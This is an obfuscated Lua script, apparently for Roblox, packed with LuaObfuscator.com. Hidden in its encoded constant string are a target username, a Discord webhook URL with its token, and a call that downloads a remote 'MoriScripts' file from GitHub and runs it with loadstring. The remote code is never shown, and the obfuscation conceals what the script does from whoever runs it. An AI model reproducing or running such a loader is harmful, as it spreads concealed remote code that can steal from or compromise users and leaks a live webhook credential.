--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v31,1,1));return "";end end else local v85=v2(v0(v31,16));if v20 then local v93=v5(v85,v20);v20=nil;return v93;else return v85;end end end);v18=1;end if (v18==7) then function v30(v32,v33,v34)local v35=v32[1];local v36=v32[2];local v37=v32[3];return function(...)local v68=v35;local v69=v36;local v70=v37;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=2) then v34[v80[3]]=v78[v80[2]];elseif (v81==3) then v78[v80[2]]=v34[v80[3]];else do return;end end elseif (v81<=7) then if (v81<=5) then v34[v80[3]]=v78[v80[2]];elseif (v81==6) then local v123=0;local v124;local v125;local v126;local v127;while true do if (0==v123) then v124=v80[2];v125,v126=v71(v78[v124](v13(v78,v124 + 1 ,v80[3])));v123=1;end if (2==v123) then for v154=v124,v73 do v127=v127 + 1 ;v78[v154]=v125[v127];end break;end if (v123==1) then v73=(v126 + v124) -1 ;v127=0;v123=2;end end else do return;end end elseif (v81<=8) then local v109=v80[2];local v110,v111=v71(v78[v109](v13(v78,v109 + 1 ,v80[3])));v73=(v111 + v109) -1 ;local v112=0;for v118=v109,v73 do local v119=0;while true do if (v119==0) then v112=v112 + 1 ;v78[v118]=v110[v112];break;end end end elseif (v81==9) then v78[v80[2]]=v80[3];else v78[v80[2]]=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v72=v80[3];else v78[v80[2]]();end elseif (v81<=13) then v78[v80[2]]();elseif (v81==14) then v72=v80[3];else local v133=v80[2];v78[v133]=v78[v133](v13(v78,v133 + 1 ,v73));end elseif (v81<=18) then if (v81<=16) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==17) then local v136=0;local v137;while true do if (v136==0) then v137=v80[2];v78[v137]=v78[v137](v13(v78,v137 + 1 ,v73));break;end end else local v138=v80[2];local v139=v78[v80[3]];v78[v138 + 1 ]=v139;v78[v138]=v139[v80[4]];end elseif (v81<=19) then v78[v80[2]]=v34[v80[3]];elseif (v81>20) then v78[v80[2]]=v80[3]~=0 ;else local v144=v80[2];local v145=v78[v80[3]];v78[v144 + 1 ]=v145;v78[v144]=v145[v80[4]];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;function v24()local v38,v39,v40,v41=v1(v16,v19,v19 + 3 );v19=v19 + (12 -8) ;return (v41 * (48013535 -31236319)) + (v40 * 65536) + (v39 * (493 -237)) + v38 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v42==(4 -1)) then v49=nil;v50=nil;v42=2 + 2 ;end if (v42==(1277 -(37 + 1240))) then v43=0 -0 ;v44=nil;v42=3 -2 ;end if (v42~=(3 -2)) then else v45=nil;v46=nil;v42=2 -0 ;end if (v42~=4) then else v51=nil;while true do if ((1 + 2)~=v43) then else local v99=0 -0 ;while true do if (v99~=(0 -0)) then else v50=nil;v51=nil;v99=1 + 0 ;end if (v99==(1475 -(1329 + 145))) then v43=4;break;end end end if (v43~=(114 -(4 + 110))) then else v44=584 -(57 + 527) ;v45=nil;v43=972 -(140 + 831) ;end if ((1854 -(1409 + 441))==v43) then while true do if (v44~=(719 -(15 + 703))) then else local v101=0 + 0 ;while true do if (v101==0) then v47=nil;v48=nil;v101=1 + 0 ;end if (v101~=(1 -0)) then else v44=5 -3 ;break;end end end if ((440 -(262 + 176))~=v44) then else local v102=1721 -(345 + 1376) ;while true do if (v102~=(688 -(198 + 490))) then else v49=nil;v50=nil;v102=4 -3 ;end if ((1 -0)==v102) then v44=9 -6 ;break;end end end if (v44~=(0 -0)) then else local v103=0;while true do if (v103~=(1206 -(696 + 510))) then else v45=0 -0 ;v46=nil;v103=1263 -(1091 + 171) ;end if (v103==1) then v44=1 + 0 ;break;end end end if (v44==3) then v51=nil;while true do local v116=0 -0 ;local v117;while true do if (v116==0) then v117=0 -0 ;while true do if (v117~=0) then else if (v45==0) then local v157=0 -0 ;while true do if (v157~=(1257 -(1043 + 214))) then else local v164=374 -(123 + 251) ;while true do if (v164==(0 -0)) then v46={};v47={};v164=699 -(208 + 490) ;end if (v164~=(1213 -(323 + 889))) then else v157=2 -1 ;break;end end end if (v157~=(1 + 0)) then else v48={};v45=1;break;end end end if (v45==(2 + 1)) then local v158=320 -(53 + 267) ;local v159;while true do if (v158==(836 -(660 + 176))) then v159=0 + 0 ;while true do if (v159==(202 -(14 + 188))) then local v165=0;while true do if (v165==(413 -(15 + 398))) then for v174=1,v24() do v47[v174-(676 -(534 + 141)) ]=v29();end return v49;end end end end break;end end end v117=1 + 0 ;end if (v117==1) then if (v45~=(983 -(18 + 964))) then else local v160=0;local v161;while true do if (v160~=(0 + 0)) then else v161=0 + 0 ;while true do if (v161~=0) then else local v166=0 + 0 ;while true do if (v166==(0 -0)) then v49={v46,v47,nil,v48};v50=v24();v166=1 + 0 ;end if ((127 -(116 + 10))~=v166) then else v161=1;break;end end end if (v161==(1 + 0)) then v51={};v45=2 + 0 ;break;end end break;end end end if (v45~=(398 -(115 + 281))) then else local v162=0 -0 ;local v163;while true do if (v162==(0 + 0)) then v163=0 -0 ;while true do if ((1 + 0)==v163) then for v168=1 + 0 ,v24() do local v169=0 + 0 ;local v170;local v171;local v172;while true do if (1==v169) then v172=nil;while true do if (v170~=(3 -2)) then else while true do if (v171==(867 -(550 + 317))) then v172=v22();if (v21(v172,1552 -(1126 + 425) ,1)~=0) then else local v183=0 -0 ;local v184;local v185;local v186;while true do if (v183==(405 -(118 + 287))) then local v190=0 -0 ;local v191;while true do if (v190==(1121 -(118 + 1003))) then v191=0;while true do if ((2 -1)~=v191) then else v183=286 -(134 + 151) ;break;end if (v191~=0) then else local v201=1665 -(970 + 695) ;while true do if (v201==(0 -0)) then v184=v21(v172,1992 -(582 + 1408) ,10 -7 );v185=v21(v172,4 -0 ,6);v201=2 -1 ;end if (v201==(378 -(142 + 235))) then v191=1;break;end end end end break;end end end if (v183~=(7 -5)) then else if (v21(v185,1 + 0 ,978 -(553 + 424) )~=(1825 -(1195 + 629))) then else v186[2 -0 ]=v51[v186[2 + 0 ]];end if (v21(v185,2,2 + 0 )~=(242 -(187 + 54))) then else v186[783 -(162 + 618) ]=v51[v186[3]];end v183=3;end if (v183==1) then local v192=0 + 0 ;while true do if (v192==0) then local v200=0 + 0 ;while true do if (v200==(1 -0)) then v192=1;break;end if (v200==(0 -0)) then v186={v23(),v23(),nil,nil};if (v184==(0 -0)) then local v202=0;local v203;local v204;while true do if ((0 -0)~=v202) then else v203=0 -0 ;v204=nil;v202=1;end if (v202==(1 + 0)) then while true do if ((1384 -(746 + 638))~=v203) then else v204=0 + 0 ;while true do if ((0 + 0)~=v204) then else v186[3]=v23();v186[2 + 2 ]=v23();break;end end break;end end break;end end elseif (v184==1) then v186[6 -3 ]=v24();elseif (v184==(2 -0)) then v186[344 -(218 + 123) ]=v24() -((1583 -(1535 + 46))^(16 + 0)) ;elseif (v184==(1 + 2)) then local v207=0;local v208;local v209;while true do if (v207==(561 -(306 + 254))) then while true do if (v208~=(0 + 0)) then else v209=0 -0 ;while true do if (v209~=(238 -(64 + 174))) then else v186[3]=v24() -((3 -1)^(1483 -(899 + 568))) ;v186[3 + 1 ]=v23();break;end end break;end end break;end if (v207~=(216 -(42 + 174))) then else v208=0 + 0 ;v209=nil;v207=1 + 0 ;end end end v200=2 -1 ;end end end if (v192==(604 -(268 + 335))) then v183=292 -(60 + 230) ;break;end end end if (v183~=(575 -(426 + 146))) then else if (v21(v185,3,1 + 2 )~=1) then else v186[11 -7 ]=v51[v186[3 + 1 ]];end v46[v168]=v186;break;end end end break;end end break;end if (v170==(1456 -(282 + 1174))) then v171=811 -(569 + 242) ;v172=nil;v170=1976 -(1913 + 62) ;end end break;end if (v169~=0) then else local v176=0 + 0 ;while true do if ((0 -0)==v176) then v170=0 -0 ;v171=nil;v176=1 + 0 ;end if ((1025 -(706 + 318))==v176) then v169=1;break;end end end end end v45=3;break;end if (v163~=(1251 -(721 + 530))) then else local v167=0;while true do if (v167==(1662 -(1477 + 184))) then v163=1;break;end if (v167==(1271 -(945 + 326))) then for v177=2 -1 ,v50 do local v178=0 + 0 ;local v179;local v180;local v181;local v182;while true do if (v178==(856 -(564 + 292))) then v179=0 -0 ;v180=nil;v178=1;end if (v178~=2) then else while true do if (v179==1) then v182=nil;while true do if (0~=v180) then else local v187=0 + 0 ;local v188;while true do if ((0 -0)~=v187) then else v188=700 -(271 + 429) ;while true do if (v188~=0) then else v181=v22();v182=nil;v188=1 + 0 ;end if (v188==1) then v180=1501 -(1408 + 92) ;break;end end break;end end end if (v180~=(477 -(41 + 435))) then else if (v181==(1087 -(461 + 625))) then v182=v22()~=0 ;elseif (v181==2) then v182=v25();elseif (v181==(1004 -(938 + 63))) then v182=v26();end v51[v177]=v182;break;end end break;end if (v179==(0 + 0)) then v180=0;v181=nil;v179=1289 -(993 + 295) ;end end break;end if (v178~=1) then else v181=nil;v182=nil;v178=1 + 1 ;end end end v49[3]=v22();v167=1126 -(936 + 189) ;end end end end break;end end end break;end end break;end end end break;end end break;end if (v43~=1) then else v46=nil;v47=nil;v43=1173 -(418 + 753) ;end if (v43==(1 + 1)) then local v100=0 + 0 ;while true do if (v100==(1 + 0)) then v43=1 + 2 ;break;end if (v100==(0 + 0)) then v48=nil;v49=nil;v100=1 + 0 ;end end end end break;end if (v42==(531 -(406 + 123))) then v47=nil;v48=nil;v42=1772 -(1749 + 20) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v52=v24();local v53=v24();local v54=2 -1 ;local v55=(v21(v53,1 -0 ,1112 -(975 + 117) ) * (2^(1907 -(157 + 1718)))) + v52 ;local v56=v21(v53,18 + 3 ,109 -78 );local v57=((v21(v53,109 -77 )==(1019 -((2235 -1538) + 321))) and  -(2 -1)) or (1 -(0 + 0)) ;if (v56==(0 -0)) then if (v55==0) then return v57 * (0 + 0) ;else local v98=0 -0 ;while true do if (v98==((0 -0) -0)) then v56=1228 -(322 + 905) ;v54=611 -((1789 -1187) + 9) ;break;end end end elseif (v56==(3236 -(449 + 740))) then return ((v55==(872 -(826 + 46))) and (v57 * ((948 -((1450 -(902 + 303)) + 702))/(0 -(0 -0))))) or (v57 * NaN) ;end return v8(v57,v56-(329 + (1671 -977)) ) * (v54 + (v55/((1900 -(260 + 1638))^(492 -(33 + 349 + 58))))) ;end v26=nil;function v26(v58)local v59;if  not v58 then local v89=1690 -(1121 + 569) ;while true do if (v89==(214 -(22 + 192))) then v58=v24();if (v58==(683 -(483 + 200))) then return "";end break;end end end v59=v3(v16,v19,(v19 + v58) -1 );v19=v19 + v58 ;local v60={};for v82=1464 -(1404 + 59) , #v59 do v60[v82]=v2(v1(v3(v59,v82,v82)));end return v6(v60);end v18=5;end if (v18==1) then v21=nil;function v21(v61,v62,v63)if v63 then local v90=(1539 -977) -(334 + 228) ;local v91;while true do if (v90==(0 -(0 + 0))) then v91=(v61/(2^(v62-1)))%(((3 + 1) -2)^(((v63-(1 -0)) -(v62-(1 -0))) + 1 + 0)) ;return v91-(v91%((140 + 97) -((304 -(92 + 71)) + 95))) ;end end else local v92=(2 + 0)^(v62-(2 -1)) ;return (((v61%(v92 + v92))>=v92) and (2 -1)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==2) then function v22()local v64=0;local v65;while true do if (v64==(1 + (0 -0))) then return v65;end if (v64==(0 -0)) then v65=v1(v16,v19,v19);v19=v19 + (766 -(574 + 191)) ;v64=1 + 0 ;end end end v23=nil;function v23()local v66,v67=v1(v16,v19,v19 + 2 );v19=v19 + 2 + 0 ;return (v67 * (1105 -(254 + 595))) + v66 ;end v18=3;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203093O0059616E6B3132333432030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130383930323433372O3138313438363136302F44772D5F383643677147763530717A444E786B63794A71514C5164306D375F707673592O70427A6D6E58667351585A4D4E4761742O59437935675A426669584F3961707900173O00120A3O00013O0026013O000E0001000200040E3O000E000100120A000100043O001202000100033O001203000100053O001203000200063O00201400020002000700120A000400084O0015000500014O0008000200054O000F00013O00022O000D00010001000100040E3O001600010026013O00010001000100040E3O0001000100120A000100043O001202000100093O00120A0001000B3O0012020001000A3O00120A3O00023O00040E3O000100012O00043O00017O00",v9(),...);
